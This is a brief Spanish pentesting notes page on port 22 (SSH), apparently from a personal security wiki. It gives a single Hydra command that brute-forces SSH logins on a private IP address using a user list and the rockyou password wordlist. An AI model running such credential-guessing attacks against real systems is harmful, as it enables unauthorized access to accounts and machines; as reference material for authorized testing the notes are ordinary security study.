> For the complete documentation index, see [llms.txt](https://wiki.linarescorrales.es/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://wiki.linarescorrales.es/apuntes/puertos-y-servicios/22-ssh.md).

# 22 - SSH

## Fuerza bruta de usuarios y contraseñas

#### Hydra

```
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.18.113 -t 4 ssh
```
